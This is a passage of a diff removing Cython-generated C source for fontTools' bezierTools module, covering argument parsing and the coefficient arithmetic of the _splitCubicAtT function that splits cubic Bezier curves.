(void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, 1); __PYX_ERR(0, 728, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, 2); __PYX_ERR(0, 728, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, 3); __PYX_ERR(0, 728, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "_splitCubicAtT") < 0)) __PYX_ERR(0, 728, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - __pyx_v_d = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_splitCubicAtT", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 728, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_41_splitCubicAtT(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_41_splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_segments = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_i = NULL; - PyObject *__pyx_v_t1 = NULL; - PyObject *__pyx_v_t2 = NULL; - PyObject *__pyx_v_delta = NULL; - PyObject *__pyx_v_delta_2 = NULL; - PyObject *__pyx_v_delta_3 = NULL; - PyObject *__pyx_v_t1_2 = NULL; - PyObject *__pyx_v_t1_3 = NULL; - PyObject *__pyx_v_a1x = NULL; - PyObject *__pyx_v_a1y = NULL; - PyObject *__pyx_v_b1x = NULL; - PyObject *__pyx_v_b1y = NULL; - PyObject *__pyx_v_c1x = NULL; - PyObject *__pyx_v_c1y = NULL; - PyObject *__pyx_v_d1x = NULL; - PyObject *__pyx_v_d1y = NULL; - PyObject *__pyx_v_pt1 = NULL; - PyObject *__pyx_v_pt2 = NULL; - PyObject *__pyx_v_pt3 = NULL; - PyObject *__pyx_v_pt4 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - PyObject *(*__pyx_t_5)(PyObject *); - Py_ssize_t __pyx_t_6; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - PyObject *__pyx_t_12 = NULL; - int __pyx_t_13; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_splitCubicAtT", 0); - __Pyx_INCREF(__pyx_v_ts); - - /* "fontTools/misc/bezierTools.py":729 - * - * def _splitCubicAtT(a, b, c, d, *ts): - * ts = list(ts) # <<<<<<<<<<<<<< - * ts.insert(0, 0.0) - * ts.append(1.0) - */ - __pyx_t_1 = PySequence_List(__pyx_v_ts); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 729, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_ts, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":730 - * def _splitCubicAtT(a, b, c, d, *ts): - * ts = list(ts) - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * segments = [] - */ - __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_ts, __pyx_n_s_insert); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 730, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 730, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":731 - * ts = list(ts) - * ts.insert(0, 0.0) - * ts.append(1.0) # <<<<<<<<<<<<<< - * segments = [] - * ax, ay = a - */ - __pyx_t_3 = __Pyx_PyObject_Append(__pyx_v_ts, __pyx_float_1_0); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 731, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":732 - * ts.insert(0, 0.0) - * ts.append(1.0) - * segments = [] # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 732, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_v_segments = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":733 - * ts.append(1.0) - * segments = [] - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = __pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 733, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 733, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 733, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 733, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 733, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 733, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":734 - * segments = [] - * ax, ay = a - * bx, by = b # <<<<<<<<<<<<<< - * cx, cy = c - * dx, dy = d - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 734, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 734, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 734, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 734, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 734, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 734, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_by = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":735 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * dx, dy = d - * for i in range(len(ts) - 1): - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 735, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 735, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 735, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 735, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 735, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 735, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_cy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":736 - * bx, by = b - * cx, cy = c - * dx, dy = d # <<<<<<<<<<<<<< - * for i in range(len(ts) - 1): - * t1 = ts[i] - */ - if ((likely(PyTuple_CheckExact(__pyx_v_d))) || (PyList_CheckExact(__pyx_v_d))) { - PyObject* sequence = __pyx_v_d; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 736, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 736, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 736, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_d); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 736, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 736, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 736, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_dx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_dy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":737 - * cx, cy = c - * dx, dy = d - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - __pyx_t_6 = PyObject_Length(__pyx_v_ts); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 737, __pyx_L1_error) - __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_6 - 1)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (likely(PyList_CheckExact(__pyx_t_1)) || PyTuple_CheckExact(__pyx_t_1)) { - __pyx_t_2 = __pyx_t_1; __Pyx_INCREF(__pyx_t_2); - __pyx_t_6 = 0; - __pyx_t_7 = NULL; - } else { - __pyx_t_6 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 737, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - for (;;) { - if (likely(!__pyx_t_7)) { - if (likely(PyList_CheckExact(__pyx_t_2))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_1); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_1); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 737, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 737, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } - } else { - __pyx_t_1 = __pyx_t_7(__pyx_t_2); - if (unlikely(!__pyx_t_1)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 737, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_1); - } - __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":738 - * dx, dy = d - * for i in range(len(ts) - 1): - * t1 = ts[i] # <<<<<<<<<<<<<< - * t2 = ts[i + 1] - * delta = t2 - t1 - */ - __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 738, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_XDECREF_SET(__pyx_v_t1, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":739 - * for i in range(len(ts) - 1): - * t1 = ts[i] - * t2 = ts[i + 1] # <<<<<<<<<<<<<< - * delta = t2 - t1 - * - */ - __pyx_t_1 = __Pyx_PyInt_AddObjC(__pyx_v_i, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 739, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 739, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_t2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":740 - * t1 = ts[i] - * t2 = ts[i + 1] - * delta = t2 - t1 # <<<<<<<<<<<<<< - * - * delta_2 = delta * delta - */ - __pyx_t_4 = PyNumber_Subtract(__pyx_v_t2, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 740, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":742 - * delta = t2 - t1 - * - * delta_2 = delta * delta # <<<<<<<<<<<<<< - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_delta, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 742, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":743 - * - * delta_2 = delta * delta - * delta_3 = delta * delta_2 # <<<<<<<<<<<<<< - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_delta, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 743, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta_3, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":744 - * delta_2 = delta * delta - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 # <<<<<<<<<<<<<< - * t1_3 = t1 * t1_2 - * - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t1, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 744, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_t1_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":745 - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 # <<<<<<<<<<<<<< - * - * # calc new a, b, c and d - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t1, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 745, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_t1_3, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":748 - * - * # calc new a, b, c and d - * a1x = ax * delta_3 # <<<<<<<<<<<<<< - * a1y = ay * delta_3 - * b1x = (3 * ax * t1 + bx) * delta_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_delta_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 748, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_a1x, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":749 - * # calc new a, b, c and d - * a1x = ax * delta_3 - * a1y = ay * delta_3 # <<<<<<<<<<<<<< - * b1x = (3 * ax * t1 + bx) * delta_2 - * b1y = (3 * ay * t1 + by) * delta_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_delta_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 749, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_a1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":750 - * a1x = ax * delta_3 - * a1y = ay * delta_3 - * b1x = (3 * ax * t1 + bx) * delta_2 # <<<<<<<<<<<<<< - * b1y = (3 * ay * t1 + by) * delta_2 - * c1x = (2 * bx * t1 + cx + 3 * ax * t1_2) * delta - */ - __pyx_t_4 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_v_ax, 3, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_4, __pyx_v_t1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_1, __pyx_v_bx); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_4, __pyx_v_delta_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 750, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_b1x, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":751 - * a1y = ay * delta_3 - * b1x = (3 * ax * t1 + bx) * delta_2 - * b1y = (3 * ay * t1 + by) * delta_2 # <<<<<<<<<<<<<< - * c1x = (2 * bx * t1 + cx + 3 * ax * 